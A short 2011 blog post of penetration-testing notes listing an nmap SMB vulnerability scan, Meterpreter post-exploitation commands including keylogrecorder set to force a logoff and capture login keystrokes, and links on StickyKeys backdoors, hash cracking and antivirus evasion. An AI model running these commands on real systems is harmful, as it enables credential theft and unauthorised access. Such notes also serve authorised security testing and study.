Monday, June 13, 2011

Offensive Security

Verify
nmap -sV -PN -p 445,137,139 --script=smb-check-vulns.nse


Meterpreter common commands

meterpreter > getprivs
meterpreter > migrate 2976
meterpreter > bglist

meterpreter > use -l
meterpreter > ?


meterpreter > bgrun keylogrecorder -c 1 -t 15
meterpreter> run keylogrecorder -c 1 -l -t 5
-c 1 to record a login session, "-l" to force logoff, and "-t 5" to deliver the keystrokes every 5 sec.

Basic meterpreter



Meterpreter Cllient commands
http://en.wikibooks.org/wiki/Metasploit/MeterpreterClient

Vulnerabilidad StickyKeys (sethc.exe)
http://foro.infiernohacker.com/index.php?topic=1867.0

Tools
http://www.md5decrypter.co.uk/

REG
http://ss64.com/nt/reg.html

Meterpreter REG
http://carnal0wnage.attackresearch.com/2007/06/defating-nod32-av.html

examples:
[1] Keylogging
http://www.offensive-security.com/metasploit-unleashed/Keylogging
[2] http://tekjournal.wordpress.com/2011/01/08/login-keystroke-recording/
[3] http://pctechtips.org/metasploit-getting-user-password-with-keylogrecorder/
[4] http://www.offensive-security.com/metasploit-unleashed/Meterpreter_Screen_Capture
[5] http://exploit.co.il/hacking/screenspy-meterpreter-script-review/

modules:
http://www.metasploit.com/modules/auxiliary/analyze/jtr_crack_fast


references:
[1] http://www.blueliv.com/downloads/Meterpreter_cheat_sheet_v0.1.pdf
[2] http://www.question-defense.com/2009/12/21/getting-started-with-meterpreter
[3] Custom exploit
http://www.pentester.es/2009/11/por-que-no-consigo-shell-con-mi.html
By at
Labels:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Firefox open multiple private window

    /opt/firefox/firefox-bin --profile $(mktemp -d) --private-window www.google.com www.bing.com